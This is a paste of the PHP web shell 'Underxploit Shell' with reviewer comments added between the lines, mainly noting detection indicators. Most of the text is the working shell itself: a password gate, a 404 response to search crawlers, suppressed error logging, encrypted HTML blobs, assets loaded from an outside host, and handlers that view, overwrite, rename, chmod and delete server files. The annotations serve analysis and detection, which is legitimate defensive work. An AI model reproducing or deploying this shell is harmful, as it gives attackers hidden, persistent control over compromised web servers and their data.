WILDAN_IZZUDIN

UNDERXPLOIT SHELL [1ST]

Dec 11th, 2017
  1. <?php
  2. /*! Description & About
  3.         * Underxploit Shell 0.0.1
  4.         * Responsive Version
  5.         * Source Viewer With Syntax Highligting
  6.         * Simple Gradient Alert
  7.         * Without Log's
  8.         * Clean Url
  9.         * Paralax Cover
  10.         * Programmed By Wildan Izzudin
  11.         * Web Shell (c) 2017
  12.         * Fix On 11, Dec 2017 (Monday)
  13. End !*/
  // NOTE(review): the rest of this paste is a password-gated PHP file manager (a "web shell").
  // Error reporting is turned off first, so the script emits no PHP warnings or notices.
  14. error_reporting(0);
  15. // --- pass : underxploit --- //
  // Hard-coded 32-hex-digit digest; the gate further down compares md5() of the submitted
  // password against it. The author's comment above names the plaintext (not verified here).
  16. $pass = "0bdec2f837ad15748be105faaf60db68";
  // cl() (defined later in the file) strips magic-quotes slashes from request data when that
  // legacy setting is on.
  17. $_POST = cl($_POST);
  18. $_GET = cl($_GET);
  19. $_COOKIE = cl($_COOKIE);
  // All later request handling reads $_COEG: POST and GET merged (on a key collision the GET
  // value wins, since it is the later array_merge() argument), then passed through xp(), which
  // applies rawurldecode() to values PHP has already URL-decoded once. Request-inspection rules
  // therefore need to account for doubly encoded parameter values.
  20. $_COEG = array_merge($_POST, $_GET);
  21. $_COEG = array_map("xp", $_COEG);
  22. $cookie = md5($_SERVER['HTTP_USER_AGENT']);
  // The cookie name tested here ends in "-underxploit" while the name written by vb() ends in
  // "underxploit" (no hyphen), so the test never sees the cookie this code sets. Unless a cookie
  // with the hyphenated name arrives some other way, every response carries a Set-Cookie named
  // md5(Host)."underxploit" whose value is md5(User-Agent) -- a usable response-header indicator.
  23. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."-underxploit"])) {
  24. vb(md5($_SERVER['HTTP_HOST'])."underxploit", $cookie);
  25. }
  /**
   * Set cookie $k to $v for the current request and for the client.
   *
   * Writes the value into $_COOKIE so later checks in the same request see it, then calls
   * setcookie() with only name and value (no expiry, path, or flag arguments are passed).
   */
  26. function vb($k, $v) {
  27.     $_COOKIE[$k] = $v;
  28.     setcookie($k, $v);
  29. }
  /**
   * Print a <meta http-equiv="refresh"> tag that sends the browser to $y after one second.
   *
   * $y is concatenated into the attribute without escaping. Returns $y unchanged.
   */
  30. function mtr($y) {
  31.     echo('<meta http-equiv="refresh" content="1;url='.$y.'"/>');
  32.     return $y;
  33. }
  /**
   * Recursively delete the directory $dirname and everything below it.
   *
   * Returns false when no directory handle could be obtained: if $dirname is not a directory,
   * $dir_handle is never assigned and the !$dir_handle test is true. Otherwise returns true
   * without checking the results of unlink() or rmdir(), so true does not prove the tree is gone.
   * The readdir() loop tests the entry name for truthiness, so an entry named "0" would end the
   * walk early.
   *
   * NOTE(review): the caller passes a directory taken from the request, and no path restriction
   * is visible here; deletion is limited only by the web server account's filesystem permissions.
   */
  34. function deledir($dirname) {
  35.          if (is_dir($dirname))
  36.            $dir_handle = opendir($dirname);
  37.      if (!$dir_handle)
  38.           return false;
  39.      while($file = readdir($dir_handle)) {
  40.            if ($file != "." && $file != "..") {
  41.                 if (!is_dir($dirname."/".$file))
  42.                      unlink($dirname."/".$file);
  43.                 else
  44.                      deledir($dirname.'/'.$file);
  45.            }
  46.      }
  47.      closedir($dir_handle);
  48.      rmdir($dirname);
  49.      return true;
  50. }
  /**
   * Decode and decrypt an embedded string.
   *
   * Steps visible in the body: define the constant x13 as the hex-escaped literal "1337"
   * (the @ hides the notice on repeated calls); base64-decode $x17; take the first
   * mcrypt_get_iv_size() bytes as the IV; decrypt the remainder with Rijndael-128 in CBC mode
   * under the key hash('sha256', x13, true); strip trailing NUL padding and return the result.
   *
   * NOTE(review): key and IV are both recoverable from this file, so the blobs passed to x()
   * can be decrypted offline for analysis rather than by running the sample. The mcrypt
   * extension was removed from PHP core in 7.2, so without it the call fails on a later runtime.
   */
  51. function a($x17) {
  52. @define("x13", "\x31\x33\x33\x37", true);
  53. $x14 = base64_decode($x17);
  54. $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
  55. $x19 = rtrim(
  56.     mcrypt_decrypt(
  57.         MCRYPT_RIJNDAEL_128,
  58.         hash('sha256', x13, true),
  59.         substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
  60. return $x19;
  61. }
  // Thin alias for a(): returns the decrypted form of $b. The page-building code echoes the
  // result directly, so the decrypted text becomes part of the HTML output.
  62. function x($b) {
  63.     $c = a($b);
  64. return $c;
  65. }
  // Runtime settings, each prefixed with @ so a refused change stays silent.
  // error_log=NULL and log_errors=0 stop PHP from logging errors for this script (the banner's
  // "Without Log's"). These calls do not touch web-server access logs, which still record each
  // request made to the file.
  66. @ini_set('error_log',NULL);
  67. @ini_set('log_errors',0);
  68. @ini_set('html_errors',0);
  // Removes the execution time limit (repeated via set_time_limit() below).
  69. @ini_set('max_execution_time',0);
  // NOTE(review): output_buffering and file_uploads are not changeable through ini_set() at
  // runtime (PERDIR / SYSTEM scope), so these two calls are expected to have no effect.
  70. @ini_set('output_buffering',0);
  71. @ini_set('file_uploads',1);
  72. @set_time_limit(0);
  73. @clearstatcache();
  // Hex-escaped string constants; the third argument (true) requests case-insensitive names,
  // a define() feature deprecated in PHP 7.3 and removed in 8.0.
  // x4 decodes to "http://xero.esy.es/me/", the same host the login page references in plain
  // text. The page header builds favicon, logo, stylesheet and script URLs from it, so a browser
  // that opens this page fetches from that host -- a network indicator for proxy or DNS logs.
  74. @define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x78\x65\x72\x6f\x2e\x65\x73\x79\x2e\x65\x73\x2f\x6d\x65\x2f", true);
  // x5, x7 and x6 decode to the query-string fragments "dir=", "command=" and "file=".
  // Together with the values compared against $_COEG['command'] later in the file, they give
  // the URL shape to search for in access logs.
  75. @define("x5", "\x64\x69\x72\x3d", true);
  76. @define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
  77. @define("x6", "\x66\x69\x6c\x65\x3d", true);
  78. @define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x2f\x64\x69\x76\x3e", true);
  // Copies the hard-coded digest from $pass into the constant `sec`, which the gate below uses.
  79. @define("sec", $pass, true);
  // Working directory: when the request supplies `dir`, backslashes are normalised to "/" and
  // the process chdir()s there (a failure is hidden by @); otherwise the current directory is
  // used. No restriction on the requested path is applied in this code.
  80. if(isset($_COEG['dir'])) {
  81.         $dir = str_replace("\\", "/", $_COEG['dir']);
  82.         @chdir($dir);
  83.     } else {
  84.         $dir = str_replace("\\", "/", getcwd());
  85. }
  // Repeats the normalisation already done in both branches, then splits the path into
  // components for the breadcrumb links printed later.
  86. $dir= str_replace("\\","/", $dir);
  87. $scdir = explode("/", $dir);        
  /**
   * Undo PHP "magic quotes" escaping on a request array, recursing into nested arrays.
   *
   * Does nothing unless get_magic_quotes_gpc() exists and returns true. With
   * magic_quotes_sybase unset or "off", values go through stripslashes(); otherwise a
   * str_replace() runs first. Inside double quotes \' is not an escape sequence, so that search
   * string is backslash-quote-backslash-quote and the replacement is backslash-quote.
   * Returns the (possibly modified) array; non-array input is returned unchanged.
   */
  88. function cl($arr){
  89.     $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
  90. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
  91.         if(is_array($arr)){
  92.             foreach($arr as $k=>$v){
  93.                 if(is_array($v)) $arr[$k] = cl($v);
  94.                 else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
  95.             }
  96.         }
  97.     }
  98.     return $arr;
  99. }
  // Applies rawurldecode() to a string, or to each element of an array (one level only; a
  // nested array element would itself be handed to rawurldecode()).
  100. function xp($str){
  101.     return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
  102. }
  // Prints an inline <script> that sets window.location to $r (concatenated without
  // escaping) and returns $r.
  103. function r($r) {
  104.     echo('<script>window.location = "'.$r.'";</script>');
  105.     return $r;
  106. }
  // Prints a bare notif({...}) JavaScript call with $s as the message and returns $s. Unlike
  // error() and success() it emits no <script> wrapper, so it only works when the caller is
  // already printing inside a script block.
  // NOTE(review): notif() is not defined in this file; presumably it comes from the remotely
  // loaded alert.js -- confirm against that asset.
  107. function s($s) {
  108.     echo 'notif({
  109.                 type: "default",
  110.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$s.'</font>",
  111.                 width: "all",
  112.                 height: 100,
  113.                 position: "center",
  114.             });';
  115.     return $s;
  116. }
  // Prints a <script> block that calls notif({...}) with $text as the message, then returns
  // $text. The body is identical to success(); only the function name differs.
  117. function error($text) {
  118. echo '<script> notif({
  119.                 type: "default",
  120.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
  121.                 width: "all",
  122.                 height: 100,
  123.                 position: "center",
  124.             });</script>';
  125. return $text;
  126. }
  // Prints a <script> block that calls notif({...}) with $text as the message, then returns
  // $text. The body is identical to error(); only the function name differs.
  127. function success($text) {
  128. echo '<script> notif({
  129.                 type: "default",
  130.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
  131.                 width: "all",
  132.                 height: 100,
  133.                 position: "center",
  134.             });</script>';
  135. return $text;
  136. }
  // Second magic-quotes pass: when the setting is on, defines stripslashes_array() and applies
  // it to $_COEG and $_COOKIE, which were already cleaned by cl() at the top of the file.
  // NOTE(review): unlike cl(), this call has no function_exists() guard. get_magic_quotes_gpc()
  // was removed in PHP 8.0, so the script stops here with a fatal error on such a runtime --
  // one sign, along with the mcrypt calls, that the sample targets older PHP.
  137. if(get_magic_quotes_gpc()) {
  138.     function stripslashes_array($array) {
  139.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  140. }
  141.     $_COEG = stripslashes_array($_COEG);
  142.     $_COOKIE = stripslashes_array($_COOKIE);
  143. }
  // Access gate, active whenever the `sec` digest is non-empty.
  // 1) A request parameter `pass` (GET or POST, via $_COEG) whose md5() loosely equals `sec`
  //    sets a cookie named md5(Host) whose value is the digest itself.
  // 2) Any request lacking that cookie, or carrying a different value, goes to login(), defined
  //    just below: it answers listed crawler user agents with "404 Not Found" and otherwise
  //    prints the password form and terminates via die().
  // NOTE(review): for detection, an authenticated session is a request whose cookie is named
  // md5(<Host header>) and whose value equals the stored digest. The value is not tied to the
  // client or to time.
  144. if(!empty(sec)) {
  145.     if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec))         vb(md5($_SERVER['HTTP_HOST']), sec);
  146. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != sec))
  147.         login();
  148. }
  149. function login() {
  150. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  151.         $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  152.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  153.           header('HTTP/1.0 404 Not Found');
  154.           exit;
  155.      }
  156.  } die('<html><head>
  157. <title>LOGIN | UNDERXPLOIT SHELL [1ST]</title>
  158. <link rel="icon" href="http://xero.esy.es/me/favicon.ico" type="image/x-icon" />
  159. <meta property="og:image" content="http://xero.esy.es/me/logo.jpg">
  160. <meta name="viewport" content="width=device-width, initial-scale=1"><meta name="theme-color" content="#3c3b3f">
  161. <script src="http://xero.esy.es/me/jquery-2.js"></script>
  162. <script>baseUrl = window.location.href.split("?")[0]; window.history.pushState("name", "?", baseUrl);</script>
  163. <style>
  164. @import url("https://fonts.googleapis.com/css?family=Cabin");
  165. *{
  166.     box-sizing: border-box;
  167. }
  168.    body {
  169.       font-size: 15px;
  170.         color:#ddd;
  171.         margin:auto;
  172.         font-family: "Cabin";
  173.         color:#ddd;
  174.         margin:auto;
  175.         font-family: "Cabin";
  176.       background:url("http://xero.esy.es/me/bg.jpg") fixed no-repeat;
  177.         background-size: cover;
  178. }
  179. ::selection {
  180.    background-color: rgba(201,223,255,0.2);
  181.    color: #ffffff;
  182. }
  183. ::-moz-selection {
  184.    background-color: rgba(201,223,255,0.1);
  185.    color: #ffffff;
  186. }
  187. .image {
  188.     width:150px;
  189.     height:150px;
  190.     border-radius: 100%;
  191.     padding:2px;
  192.     border: 1px solid #ddd;
  193. }
  194. .animasi{opacity: 0.2;-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}
  195. .animasi.infinite{opacity: 0.2;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}
  196. .animasi:hover{opacity: 0.2;-webkit-animation-duration:0.1s;animation-duration:0.1s;}
  197.        @-webkit-keyframes anim1{from,20%,40%,60%,80%,to{-webkit-animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000);animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000)}0%{opacity:0;-webkit-transform:scale3d(.3,.3,.3);transform:scale3d(.3,.3,.3)}20%{-webkit-transform:scale3d(1.1,1.1,1.1);transform:scale3d(1.1,1.1,1.1)}40%{-webkit-transform:scale3d(.9,.9,.9);transform:scale3d(.9,.9,.9)}60%{opacity:1;-webkit-transform:scale3d(1.03,1.03,1.03);transform:scale3d(1.03,1.03,1.03)}80%{-webkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97)}to{opacity:1;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}@keyframes anim1{from,20%,40%,60%,80%,to{-webkit-animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000);animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000)}0%{opacity:1;-webkit-transform:scale3d(1.0,1.0,1.0);transform:scale3d(1.0,1.0,1.0)}20%{-webkit-transform:scale3d(1.1,1.1,1.1);transform:scale3d(1.1,1.1,1.1)}40%{-webkit-transform:scale3d(.9,.9,.9);transform:scale3d(.9,.9,.9)}60%{opacity:1;-webkit-transform:scale3d(1.03,1.03,1.03);transform:scale3d(1.03,1.03,1.03)}80%{-webkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97)}to{opacity:1;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}.anim1{-webkit-animation-name:anim1;animation-name:anim1}
  198. input[type=password] {
  199.     padding: 7px;
  200.     background: rgba(255,255,255,0.1);
  201.     border:0px;
  202.     border-bottom: 0px solid #ddd;
  203.     color: #ddd;
  204.     font-family: "Cabin";
  205.     text-align:center;
  206.     font-size:15px;
  207.     border-radius:0.3em
  208. }
  209. h3 {
  210.     font-weight: 100;
  211. }
  212. .wrap {
  213.     width: 350px;
  214.     background: -moz-linear-gradient(top, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%); /* FF3.6-15 */
  215.  background: -webkit-linear-gradient(top, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%); /* Chrome10-25,Safari5.1-6 */
  216.  background: linear-gradient(to bottom, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%);
  217.  box-shadow: inset 0 0 1px rgba(255,255,255,0.5), 0px 0px 20px rgba(0,0,0,0.5);
  218.   border-radius: 0.3em;
  219.     padding: 30px;
  220.     margin: 20px;
  221. }
  222. ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
  223.  color: #ddd;
  224. }
  225. ::-moz-placeholder { /* Firefox 19+ */
  226.  color: #ddd;
  227. }
  228. :-ms-input-placeholder { /* IE 10+ */
  229.  color: #ddd;
  230. }
  231. :-moz-placeholder { /* Firefox 18- */
  232.  color: #ddd;
  233. }
  234.  
  235. /* Design By Wildan Izzudin */
  236. @media screen and (max-width: 2024px) {
  237.    .wrap {
  238.         width: 350px;
  239.                margin-top:160px;
  240.     }
  241. }
  242. @media screen and (max-width: 1024px) {
  243.     .wrap {
  244.         width: 350px;
  245.                margin-top:50px;
  246.     }
  247. }
  248. @media screen and (max-width: 780px) {
  249.     .wrap {
  250.         width: auto;
  251.                margin-top:50px;
  252.     }
  253. }
  254. </style>
  255. </head><body>
  256. <center>
  257. <div class="wrap">
  258.             <h3>Underxploit Shell [1st]</h3>
  259.             <img src="http://xero.esy.es/me/logo.jpg" class="image animasi infinite anim1"><br><br>
  260.             <form action="" method="post"><input type="password" placeholder="" name="pass"></div>');
  261. }
  262. ?>
  263. <?php
  264. echo('<html><head><title>UNDERXPLOIT SHELL [1ST]</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
  265. <link rel="icon" href="'.x4.'favicon.ico" type="image/x-icon" />
  266.     <meta property="og:image" content="'.x4.'logo.jpg"><meta name="theme-color" content="#3c3b3f"><link rel="stylesheet" type="text/css" href="'.x4.'style.css"><link rel="stylesheet" type="text/css" href="'.x4.'alert.css"><script type="text/javascript" src="'.x4.'alert.js"></script><script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/><script type="text/javascript" src="'.x4.'jquery.js"></script>
  267. <script>
  268.     function c(x) {
  269.         window.location = x
  270.         }
  271. </script>');
  272. echo(x("\x73\x66\x38\x76\x34\x4e\x73\x44\x2b\x31\x31\x35\x73\x73\x49\x42\x6e\x61\x43\x42\x6b\x67\x35\x47\x41\x62\x71\x77\x73\x68\x33\x65\x6c\x48\x56\x66\x42\x2f\x4b\x69\x37\x38\x4a\x6e\x4a\x74\x6a\x58\x57\x70\x2b\x30\x67\x38\x67\x41\x38\x70\x59\x76\x46\x71\x6c\x4a\x63\x72\x53\x43\x62\x76\x6a\x65\x49\x63\x39\x76\x32\x4e\x5a\x30\x49\x43\x30\x7a\x2f\x76\x63\x77\x6b\x38\x56\x30\x47\x61\x33\x44\x59\x52\x37\x4a\x39\x38\x77\x46\x78\x2f\x55\x41\x6f\x42\x37\x45\x76\x6b\x62\x6a\x58\x41\x64\x39\x67\x63\x67\x4a\x68\x6e\x34\x4c\x61\x63\x58\x31\x54\x43\x74\x47\x72\x72\x5a\x43\x41\x73\x53\x36\x75\x61\x38\x6d\x43\x78\x7a\x75\x76\x33\x7a\x50\x55\x52\x68\x30\x43\x33\x65\x4e\x7a\x44\x67\x58\x56\x41\x30\x3d"));
  273. echo(x("\x68\x2f\x67\x43\x67\x35\x4b\x57\x39\x33\x55\x57\x39\x70\x78\x58\x4d\x73\x4e\x74\x31\x73\x4f\x6a\x67\x71\x72\x59\x4b\x4f\x4b\x50\x4d\x61\x70\x4a\x56\x78\x4f\x6c\x71\x67\x65\x71\x76\x44\x47\x6d\x72\x65\x6c\x35\x76\x75\x2f\x2f\x33\x52\x76\x50\x6a\x41\x73\x59\x4c\x55\x61\x61\x72\x6f\x79\x44\x67\x61\x72\x77\x51\x74\x42\x70\x69\x6a\x59\x70\x5a\x65\x6d\x4a\x55\x79\x50\x37\x51\x32\x6c\x33\x59\x69\x53\x6e\x67\x49\x36\x64\x71\x2f\x77\x59\x58\x58\x68\x5a\x78\x4e\x74\x64\x6c\x37\x64\x2b\x56\x5a\x66\x68\x76\x46\x4f\x76\x37\x45\x39\x6c\x47\x74\x36\x6b\x44\x41\x45\x55\x6f\x70\x58\x7a\x6f\x70\x6b\x41\x43\x6b\x61\x41\x4f\x52\x32\x76\x77\x32\x39\x67\x72\x50\x34\x47\x6c\x65\x50\x2b\x31\x31\x64\x45\x55\x6b\x77\x79\x2b\x66\x6c\x6c\x32\x53\x73\x5a\x39\x42\x75\x49\x72\x35\x50\x77\x30\x52\x61\x62\x53\x52\x38\x6a\x52\x7a\x50\x62\x59\x6e\x33\x6f\x52\x47\x55\x57\x55\x78\x70\x58\x30\x77\x64\x48\x31\x53\x4b\x47\x73\x6b\x59\x52\x38\x71\x51\x34\x47\x4f\x78\x30\x47\x2b\x56\x42\x72\x58\x2f\x67\x49\x50\x37\x51\x6a\x6d\x75\x55\x47\x54\x43\x39\x78\x4d\x5a\x50\x73\x32\x6f\x6e\x79\x6e\x31\x54\x75\x43\x74\x48\x69\x45\x51\x4a\x38\x51\x6f\x67\x49\x58\x4d\x32\x4f\x79\x72\x53\x4f\x2b\x51\x68\x31\x7a\x62\x4d\x44\x2f\x38\x3d"));
  274. echo('<i class="fa fa-chevron-up move-top"></i>');
  275. echo('<script>
  276. jQuery(document).ready(function() {
  277.    var offset = 220;
  278.    var duration = 500;
  279.    jQuery(window).scroll(function() {
  280.        if (jQuery(this).scrollTop() > offset) {
  281.            jQuery(\'.move-top\').fadeIn(duration);
  282.        } else {
  283.            jQuery(\'.move-top\').fadeOut(duration);
  284.        }
  285.    });
  286.    jQuery(\'.move-top\').click(function(event) {
  287.        event.preventDefault();
  288.        jQuery(\'html, body\').animate({scrollTop: 0}, duration);
  289.        return false;
  290.    })
  291. });
  292. </script>');
  293. echo('<script>hljs.initHighlightingOnLoad();</script>
  294. </head></body>
  295. <div class="co-ontainer-2">
  296. <div class="atas">
  297. <div class="menus">
  298. <button class="xa" onclick=\'c("'.$_SERVER['PHP_SELF'].'")\'><i class="fa fa-home"></i></button>
  299. <button class="xa" onclick=\'c("?'.x5.getcwd().'&'.x7.'about")\'><i class="fa fa-question"></i></button>
  300. <button class="xa" onclick=\'c("?'.x5.getcwd().'&'.x7.'logout")\'><i class="fa fa-power-off"></i></button></div></div>
  301. <div class="dir">
  302. <table style="width:100%">
  303. <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><font color="#ddd">ROOT</font> :</td><td class="dir-td-right break wrap">');
  304. foreach($scdir as $c_dir => $cdir) {   
  305.     echo "<a class='a' onclick=\"c('?dir=";
  306.     for($i = 0; $i <= $c_dir; $i++) {
  307.         echo $scdir[$i];
  308.         if($i != $c_dir) {
  309.         echo "/";
  310.         }
  311.     }
  312.     echo "')\">$cdir</a>/";
  313. }
  314. echo("</td></table></div></th></table></div>");
  315. $filez = basename($_COEG['file']);
  316. $size = filesize("$dir/$filez")/1024;
  317.             $size = round($size,3);
  318.             if($size > 1024) {
  319.                 $size = round($size/1024,2). ' MB';
  320.             } else {
  321.                 $size = $size. ' KB';
  322. }
  323. echo('<div class="coL">');
  324.  
  325.  
  326. if($_COEG['command'] == 'logout') {
  327. r($_SERVER['PHP_SELF']);
  328. setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
  329. }  
  330. elseif($_COEG['command'] == 'view') {
  331. echo '<div class="coL-panel"><table>
  332. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
  333. echo '<div class="coL-option">';
  334. echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  335. <hr>';
  336. echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
  337. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  338. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  339. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  340. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  341. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  342. if(empty($source)) {
  343.     error('Source Not Found !!');
  344.     echo x9;
  345. } else {
  346.     echo "<pre class='top'><code class='php'>".$source."</code></pre></div>";
  347.     }
  348. }
  349.  
  350. // --- edit file --- //
  351. elseif($_COEG['command'] == 'edit') {
  352.     if($_COEG['save']) {
  353.         $save = file_put_contents($_COEG['file'], $_COEG['src']);
  354.     if($save) {
  355.     success('Source Saved !!');
  356.         } else {
  357.     error('Permission Denied !!');
  358.     }
  359. }
  360. echo '<div class="coL-panel"><table>
  361. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">EDIT FILE</td></table></div>';
  362. echo '<div class="coL-option">
  363. <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  364. <hr><table>';
  365. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  366. <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
  367. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  368. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  369. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  370. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  371. if(empty($source)) {
  372.     echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."'  style='margin:0px'>
  373.     <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
  374. <input type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
  375. } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
  376.     <textarea name='src' class='top'>".$source."</textarea>
  377. <input type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form></div>";
  378.   }
  379. }
  380.  
  381. // --- rename file --- //
  382. elseif($_COEG['command'] == 'rename') {
  383.         if($_COEG['rename']) {
  384.         $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
  385.         if($rename) {
  386. success('File Renamed !!');
  387. mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]);
  388.    } else {
  389. error('Permission Denied !!');
  390.         }
  391. }
  392. echo '<div class="coL-panel"><table>
  393. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">RENAME FILE</td></table></div>';
  394. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  395. <hr><table>';
  396. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  397. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  398. <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
  399. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  400. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  401. echo "<div class='coL-option top'>
  402. <br><br><br>
  403.     <center>
  404.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  405. echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  406. <table cellspacing='0'>
  407.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
  408.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  409.     </form></div></div>";
  410. }
  411.  
  412. // --- chmod --- //
  413. else if($_COEG['command'] == 'chmod') {
  414. if(isset($_COEG['perm'])) {
  415. if(chmod($_COEG['file'],$_COEG['perm'])) {
  416. success('Chmod Ok !!');
  417. } else {
  418. error('Permission Denied !!');
  419.     }
  420. }
  421. echo '<div class="coL-panel"><table>
  422. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
